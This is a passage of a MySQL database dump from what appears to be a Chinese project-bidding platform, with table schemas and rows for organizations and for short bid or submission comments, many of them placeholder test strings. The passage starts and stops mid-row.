11:33:33',255),(105,99,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,1,16,'2020-02-11 16:39:25','2020-02-11 17:02:48',NULL),(106,99,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,2,16,'2020-02-11 16:39:25','2020-02-11 17:02:48',255),(107,83,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,4,1,20,'2020-02-11 19:17:21','2020-02-11 20:08:12',NULL),(108,83,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,4,2,20,'2020-02-11 19:19:25','2020-02-11 20:08:12',255),(109,98,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,'2020-02-11 21:01:22','2020-02-11 21:01:22',NULL),(110,98,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,1,'2020-02-11 21:01:22','2020-02-11 21:01:22',255),(111,80,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,2,4,'2020-02-24 18:32:32','2020-03-19 14:13:32',255),(112,76,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,7,0,0,2,28,'2020-03-19 14:08:52','2020-04-20 20:44:50',255),(113,73,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,'2020-03-23 10:20:38','2020-08-10 09:47:37',NULL),(114,111,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,2,'2020-08-14 15:00:47','2020-09-16 10:41:21',NULL);
|
||
/*!40000 ALTER TABLE `option_numbers` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `organization_extensions`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `organization_extensions`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `organization_extensions` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`organization_id` bigint(20) DEFAULT NULL,
|
||
`description` varchar(255) DEFAULT NULL COMMENT '组织描述',
|
||
`website` varchar(255) DEFAULT NULL COMMENT '组织官方网站',
|
||
`location` varchar(255) DEFAULT NULL COMMENT '组织地区',
|
||
`repo_admin_change_team_access` tinyint(1) DEFAULT '0' COMMENT '项目管理员是否可以添加或移除团队的访问权限',
|
||
`visibility` int(11) DEFAULT '0' COMMENT '组织可见性',
|
||
`max_repo_creation` int(11) DEFAULT '-1' COMMENT '组织最大仓库数',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`num_projects` int(11) DEFAULT '0',
|
||
`num_users` int(11) DEFAULT '0',
|
||
`num_teams` int(11) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_organization_extensions_on_organization_id` (`organization_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `organization_extensions`
|
||
--
|
||
|
||
LOCK TABLES `organization_extensions` WRITE;
|
||
/*!40000 ALTER TABLE `organization_extensions` DISABLE KEYS */;
|
||
INSERT INTO `organization_extensions` VALUES (1,188,'ceshi_org_1',NULL,'11',1,1,-1,'2021-03-02 03:43:11','2021-03-02 03:43:11',0,1,1);
|
||
/*!40000 ALTER TABLE `organization_extensions` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `organization_users`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `organization_users`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `organization_users` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`user_id` bigint(20) DEFAULT NULL,
|
||
`organization_id` bigint(20) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_organization_users_on_user_id` (`user_id`),
|
||
KEY `index_organization_users_on_organization_id` (`organization_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `organization_users`
|
||
--
|
||
|
||
LOCK TABLES `organization_users` WRITE;
|
||
/*!40000 ALTER TABLE `organization_users` DISABLE KEYS */;
|
||
INSERT INTO `organization_users` VALUES (1,128,188,'2021-03-02 03:43:11','2021-03-02 03:43:11');
|
||
/*!40000 ALTER TABLE `organization_users` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `organizations`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `organizations`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `organizations` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`pinyin` varchar(255) DEFAULT NULL,
|
||
`province` varchar(255) DEFAULT NULL,
|
||
`city` varchar(255) DEFAULT NULL,
|
||
`address` varchar(255) DEFAULT NULL,
|
||
`logo_link` varchar(255) DEFAULT NULL,
|
||
`organization_type` int(11) DEFAULT '0',
|
||
`organization_code` varchar(255) DEFAULT NULL,
|
||
`authorization_time` datetime DEFAULT NULL,
|
||
`identifier` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `organizations`
|
||
--
|
||
|
||
LOCK TABLES `organizations` WRITE;
|
||
/*!40000 ALTER TABLE `organizations` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `organizations` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `paper_details`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `paper_details`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `paper_details` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`content` text NOT NULL,
|
||
`paper_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=182 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `paper_details`
|
||
--
|
||
|
||
LOCK TABLES `paper_details` WRITE;
|
||
/*!40000 ALTER TABLE `paper_details` DISABLE KEYS */;
|
||
INSERT INTO `paper_details` VALUES (1,'我刚做过类似的项目,所以我对贵项目非常感兴趣,也自认能够胜任该任务。',1,'2019-08-06 09:56:23','2019-08-06 09:56:23'),(2,'谢谢您的关注,期望能获得贵公司的欣赏。',2,'2019-08-06 09:57:41','2019-08-06 09:57:41'),(3,'大法短发',3,'2019-08-06 09:59:04','2019-08-06 09:59:04'),(4,'正在遴选之中,请耐心等待。谢谢关注!',4,'2019-08-06 11:13:54','2019-08-06 11:13:54'),(5,'附件好详细',5,'2019-08-07 14:58:03','2019-08-07 14:58:03'),(6,'我要投稿,参加过类似项目,这次专门做了优化调整。',7,'2019-08-07 15:06:43','2019-08-07 15:06:43'),(7,'我公司一直从事该方面研究,有深厚的科研和开发能力。希望能够完成该任务。',8,'2019-08-07 15:51:05','2019-08-07 15:51:05'),(8,'我有一个绝妙的Idea,就是可能需要大量的人力物力',9,'2019-08-07 15:53:12','2019-08-07 15:53:12'),(9,'我们公司应聘该项目,请给予通过。',10,'2019-08-07 15:58:30','2019-08-07 15:58:30'),(10,'我已经做完了 。',11,'2019-08-07 16:14:05','2019-08-07 16:14:05'),(11,'看了你的稿件,我发现了新世界',12,'2019-08-07 16:14:38','2019-08-07 16:14:38'),(12,'我有飞行经验,我可以',13,'2019-08-07 16:45:02','2019-08-07 16:45:02'),(13,'我公司有扎实的飞行理论根底。',14,'2019-08-07 16:50:03','2019-08-07 16:50:03'),(14,'我可以,我做过',15,'2019-08-09 09:45:38','2019-08-09 09:45:38'),(15,'sss',16,'2019-08-09 15:10:49','2019-08-09 15:10:49'),(16,'我有许多中暑经验',17,'2019-08-09 15:26:04','2019-08-09 15:26:04'),(17,'对于预防中暑以及中暑后的救治有独特的理解',18,'2019-08-09 15:58:29','2019-08-09 15:58:29'),(18,'我自己用自己开发的微信小程序。',19,'2019-08-13 08:56:16','2019-08-13 08:56:16'),(19,'我们公司在界面开发方面积累了丰富经验,可以胜任该工作。',20,'2019-08-13 10:29:13','2019-08-13 10:29:13'),(20,'12345',21,'2019-08-13 10:29:38','2019-08-13 10:29:38'),(21,'我们公司在上海开发过类似项目,我们可以胜任。',22,'2019-08-13 10:53:54','2019-08-13 10:53:54'),(22,'我们公司在界面开发方面积累了丰富经验,可以胜任该工作。',23,'2019-08-13 11:31:58','2019-08-13 11:31:58'),(23,'通过我们团队的大量实验以及数据分析和统计,总结出了一种高效的碰撞检测算法,可大大提升碰撞检测的效率,详情见附件',24,'2019-08-13 12:42:53','2019-08-13 12:42:53'),(24,'我们公司在仿真开发领域从事多年研究,积累了丰富的开发经验,对机器人建模和各种运动仿真建模有着丰富的经验。',25,'2019-08-13 12:52:05','2019-08-13 12:52:05'),(25,'我们团队曾根据6R机器人杆系的特有结构,提出了三角形包围法和端点矢量投影法来提高双机器人协调工作时连杆碰撞检测的效率\r\n',26,'2019-08-13 12:55:47','2019-08-13 12:55:47'),(26,'你们的材料真是很齐全。点赞!',27,'2019-08-13 14:35:47','2019-08-13 14:35:47'),(27,'我是一名专业的UI设计,对于仿真平台UI界面我有一些独家的设计方案可以提供,希望能得到采纳,Demo见附件',28,'2019-08-13 14:49:56','2019-08-13 14:49:56'),(28,'我们公司也有这方面的丰富经验,可以参与。',29,'2019-08-13 15:28:00','2019-08-13 15:28:00'),(29,'我们公司有雄厚的科研实力,在通信网络和视频开发方法有丰富的经验,可以胜任该工作。',30,'2019-08-13 16:14:43','2019-08-13 16:14:43'),(30,'我们可以的,有经验,ISO9001认证靠得住。',31,'2019-08-13 16:16:02','2019-08-13 16:16:02'),(31,'挺好的哈',32,'2019-08-13 18:29:18','2019-08-13 18:29:18'),(32,'我非常的喜欢,加油',33,'2019-08-13 18:29:43','2019-08-13 18:29:43'),(33,'我公司可以新研制了一种处理塑料袋的方法',34,'2019-08-22 10:29:54','2019-08-22 10:29:54'),(34,'传统的塑料袋要用传统的方法',35,'2019-08-22 10:44:06','2019-08-22 10:44:06'),(35,'人工智能对于工业的英影响,我有比较深刻的看法',36,'2019-08-23 12:58:01','2019-08-23 12:58:01'),(36,'书读百遍,其意自现',37,'2019-08-23 15:15:41','2019-08-23 15:15:41'),(37,'百年诸葛粉丝,不请自来',38,'2019-08-26 09:57:51','2019-08-26 09:57:51'),(38,'楼上可真是有够好笑的呢',39,'2019-08-26 09:59:06','2019-08-26 09:59:06'),(39,'是你楼下把',40,'2019-08-26 10:01:34','2019-08-26 10:01:34'),(40,'?',41,'2019-08-26 10:02:02','2019-08-26 10:02:02'),(41,'啊?',42,'2019-08-26 10:05:44','2019-08-26 10:05:44'),(42,'每天跑步,多吃蔬菜',43,'2019-08-26 10:28:37','2019-08-26 10:28:37'),(43,'犹豫就会败北,果断就会白给',44,'2019-08-26 10:33:50','2019-08-26 10:33:50'),(44,'没有速成,只有勤加练习',45,'2019-08-26 10:42:12','2019-08-26 10:42:12'),(45,'好的方法技巧,是成功的关键',46,'2019-08-26 10:42:52','2019-08-26 10:42:52'),(46,'每天200个蛙跳',47,'2019-08-26 10:46:29','2019-08-26 10:46:29'),(47,'每天200个仰卧起坐',48,'2019-08-26 10:46:48','2019-08-26 10:46:48'),(48,'跑步',49,'2019-08-26 10:47:43','2019-08-26 10:47:43'),(49,'健身',50,'2019-08-26 10:48:08','2019-08-26 10:48:08'),(50,'我觉得我可以的,我觉得我能负责这个项目',51,'2019-09-06 08:52:23','2019-09-06 08:52:23'),(51,'设计实现了一个优秀的界面',52,'2019-09-16 10:32:48','2019-09-16 10:32:48'),(52,'我公司在软件行业名列前茅,严格按照软件工程管理项目开发,有丰富的管理经验,请选择我们。',53,'2019-10-25 10:08:28','2019-10-25 10:08:28'),(53,'从事互联网行业多年,有丰富的经验',54,'2019-10-25 14:42:30','2019-10-25 14:42:30'),(54,'我们公司研究过,有足够的的经验和实力完成任务。',55,'2019-10-25 14:43:07','2019-10-25 14:43:07'),(55,'测试二的成果提交',56,'2019-10-25 14:43:45','2019-10-25 14:43:45'),(56,'我要报名参加。',57,'2019-10-25 15:29:51','2019-10-25 15:29:51'),(57,'我可以',58,'2019-10-25 15:30:23','2019-10-25 15:30:23'),(58,'我也要求参与其中,增强自己的身体素质。',59,'2019-10-25 15:30:58','2019-10-25 15:30:58'),(59,'我要参加',60,'2019-10-25 16:12:56','2019-10-25 16:12:56'),(60,'我们公司可以的,请选我们。',61,'2019-10-25 16:17:12','2019-10-25 16:17:12'),(61,'我要参加。',62,'2019-10-27 14:12:07','2019-10-27 14:12:07'),(62,'我司有专业ui工程师以及产品经理',63,'2019-10-27 14:12:10','2019-10-27 14:12:10'),(63,'我可以',64,'2019-10-27 14:16:02','2019-10-27 14:16:02'),(64,'很好的设计。我们从中学习不少。',65,'2019-10-27 14:20:59','2019-10-27 14:20:59'),(65,'多年机器人设计工作经验',66,'2019-10-27 14:43:01','2019-10-27 14:43:01'),(66,'我们公司一直从事机器人研究工作,我们有经验。',67,'2019-10-27 14:43:35','2019-10-27 14:43:35'),(67,'我要应征',68,'2019-10-27 14:43:41','2019-10-27 14:43:41'),(68,'我们公司有经验,请选择我们。',69,'2019-10-27 15:01:36','2019-10-27 15:01:36'),(69,'我公司可以,我们有经验。',70,'2019-10-27 15:02:56','2019-10-27 15:02:56'),(70,'我可以',71,'2019-10-27 15:04:04','2019-10-27 15:04:04'),(71,'我要投稿',72,'2019-10-28 11:15:06','2019-10-28 11:15:06'),(72,'我报名,我们公司有经验。',73,'2019-10-28 11:21:45','2019-10-28 11:21:45'),(73,'阿凡达艾弗森多付付付付付付付付',74,'2019-10-29 08:51:38','2019-10-29 08:51:38'),(74,'发送到发送到',75,'2019-10-29 08:52:58','2019-10-29 08:52:58'),(75,'我要投稿',76,'2019-10-29 14:37:22','2019-10-29 14:37:22'),(76,'我要投稿',77,'2019-10-29 14:38:16','2019-10-29 14:38:16'),(77,'444',78,'2019-10-29 15:09:46','2019-10-29 15:09:46'),(78,'团队从事机器人相关工作多年,有丰富的经验',79,'2019-11-01 15:46:48','2019-11-01 15:46:48'),(79,'我公司在行业名列前茅,严格按照工程管理项目开发,有丰富的管理经验,请选择我们。',80,'2019-11-01 15:58:28','2019-11-01 15:58:28'),(80,'我们公司研究过此类算法,并取得不错的实践成果,有足够的的经验和实力完成任务。',81,'2019-11-01 16:30:36','2019-11-01 16:30:36'),(81,'k\'j\'j',82,'2019-11-05 11:00:01','2019-11-05 11:00:01'),(82,'去去去',83,'2019-11-05 11:00:32','2019-11-05 11:00:32'),(83,'我公司在机器学习理论特别是算法设计和分析方面具有独特的经验,有一些让计算机可以自动学习的算法。在机器学习领域积累了大量数据。',84,'2019-11-05 15:21:17','2019-11-05 15:21:17'),(84,'我公司在机器学习理论特别是算法设计和分析方面具有独特的经验,有一些让计算机可以自动学习的算法。在机器学习领域积累了大量数据。',85,'2019-11-05 15:23:52','2019-11-05 15:23:52'),(85,'我公司在深度神经网络方面积累了丰富的经验。为了提高深层神经网络的训练效果,\r\n我们对神经元的连接方法以及激活函数等方面做出了调整。在建立、模拟人脑进行分析学习的神经网络,\r\n模仿人脑的机制来解释数据,积累了大量的如文本、图像、声音训练数据。',86,'2019-11-05 15:36:30','2019-11-05 15:36:30'),(86,'我们公司从事gazebo机器人研究多年,有大量的智能学习数据,特别对于算法有比较深入的研究。详情可查看附件',87,'2019-11-05 15:49:57','2019-11-05 15:49:57'),(87,'1',88,'2019-11-05 16:00:28','2019-11-05 16:00:28'),(88,'我公司在深度神经网络方面积累了丰富的经验。为了提高深层神经网络的训练效果, 我们对神经元的连接方法以及激活函数等方面做出了调整。在建立、模拟人脑进行分析学习的神经网络, 模仿人脑的机制来解释数据,积累了大量的如文本、图像、声音训练数据。',89,'2019-11-06 17:08:19','2019-11-06 17:08:19'),(89,'我公司在机器学习理论特别是算法设计和分析方面具有独特的经验,有一些让计算机可以自动学习的算法。在机器学习领域积累了大量数据。',90,'2019-11-06 17:08:52','2019-11-06 17:08:52'),(90,'我公司在机器学习理论特别是算法设计和分析方面具有独特的经验,有一些让计算机可以自动学习的算法。在机器学习领域积累了大量数据。',91,'2019-11-06 17:09:07','2019-11-06 17:09:07'),(91,'啊啊发',92,'2019-11-07 11:28:03','2019-11-07 11:28:03'),(92,'我公司在机器学习理论特别是算法设计和分析方面具有独特的经验,有一些让计算机可以自动学习的算法。在机器学习领域积累了大量数据。',93,'2019-11-07 16:46:39','2019-11-07 16:46:39'),(93,'w',94,'2019-11-07 16:46:45','2019-11-07 16:46:45'),(94,'我们公司从事gazebo机器人研究多年,有大量的智能学习数据,特别对于算法有比较深入的研究。详情可查看附件。',95,'2019-11-07 16:47:23','2019-11-07 16:47:23'),(95,' 我公司在深度神经网络方面积累了丰富的经验。为了提高深层神经网络的训练效果, 我们对神经元的连接方法以及激活函数等方面做出了调整。在建立、模拟人脑进行分析学习的神经网络, 模仿人脑的机制来解释数据,积累了大量的如文本、图像、声音训练数据。',96,'2019-11-10 13:36:51','2019-11-10 13:36:51'),(96,' 我公司在深度神经网络方面积累了丰富的经验。为了提高深层神经网络的训练效果, 我们对神经元的连接方法以及激活函数等方面做出了调整。在建立、模拟人脑进行分析学习的神经网络, 模仿人脑的机制来解释数据,积累了大量的如文本、图像、声音训练数据。',97,'2019-11-10 13:37:16','2019-11-10 13:37:16'),(97,' 我公司在深度神经网络方面积累了丰富的经验。为了提高深层神经网络的训练效果, 我们对神经元的连接方法以及激活函数等方面做出了调整。在建立、模拟人脑进行分析学习的神经网络, 模仿人脑的机制来解释数据,积累了大量的如文本、图像、声音训练数据。',98,'2019-11-10 13:37:37','2019-11-10 13:37:37'),(98,'我公司在机器学习理论特别是算法设计和分析方面具有独特的经验,有一些让计算机可以自动学习的算法。在机器学习领域积累了大量数据。 ',99,'2019-11-10 13:39:47','2019-11-10 13:39:47'),(99,'我公司在机器学习理论特别是算法设计和分析方面具有独特的经验,有一些让计算机可以自动学习的算法。在机器学习领域积累了大量数据。 ',100,'2019-11-10 13:40:05','2019-11-10 13:40:05'),(100,'我公司在机器学习理论特别是算法设计和分析方面具有独特的经验,有一些让计算机可以自动学习的算法。在机器学习领域积累了大量数据。 ',101,'2019-11-10 13:40:18','2019-11-10 13:40:18'),(101,'我们公司从事gazebo机器人研究多年,有大量的智能学习数据,特别对于算法有比较深入的研究。详情可查看附件。',102,'2019-11-10 13:41:41','2019-11-10 13:41:41'),(102,'我们公司从事gazebo机器人研究多年,有大量的智能学习数据,特别对于算法有比较深入的研究。详情可查看附件。',103,'2019-11-10 13:42:01','2019-11-10 13:42:01'),(103,'我们公司从事gazebo机器人研究多年,有大量的智能学习数据,特别对于算法有比较深入的研究。详情可查看附件。',104,'2019-11-10 13:42:17','2019-11-10 13:42:17'),(104,'我有大量数据可供使用',105,'2019-11-10 13:45:13','2019-11-10 13:45:13'),(105,'我有大量数据',106,'2019-11-10 13:45:43','2019-11-10 13:45:43'),(106,'在碰撞算法领域积累了大量数据',107,'2019-11-10 13:46:38','2019-11-10 13:46:38'),(107,'我们公司从事gazebo机器人研究多年,有大量的智能学习数据,特别对于算法有比较深入的研究。详情可查看附件。',108,'2019-11-11 10:05:47','2019-11-11 10:05:47'),(108,'我公司在机器学习理论特别是算法设计和分析方面具有独特的经验,有一些让计算机可以自动学习的算法。在机器学习领域积累了大量数据。 ',109,'2019-11-11 10:10:27','2019-11-11 10:10:27'),(109,'我公司在机器学习理论特别是算法设计和分析方面具有独特的经验,有一些让计算机可以自动学习的算法。在机器学习领域积累了大量数据。',110,'2019-11-11 17:22:44','2019-11-11 17:22:44'),(110,'sss',111,'2019-11-12 16:21:06','2019-11-12 16:21:06'),(111,'阿斯蒂芬',112,'2019-11-13 08:46:56','2019-11-13 08:46:56'),(112,'我要报名',113,'2019-11-13 08:51:15','2019-11-13 08:51:15'),(113,'s',114,'2019-11-20 20:23:47','2019-11-20 20:23:47'),(114,'速度发斯蒂芬',115,'2019-11-20 20:26:46','2019-11-20 20:26:46'),(115,'阿斯蒂芬',116,'2019-11-20 20:27:13','2019-11-20 20:27:13'),(116,'阿斯顿发达',117,'2019-11-21 08:12:46','2019-11-21 08:12:46'),(117,'啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊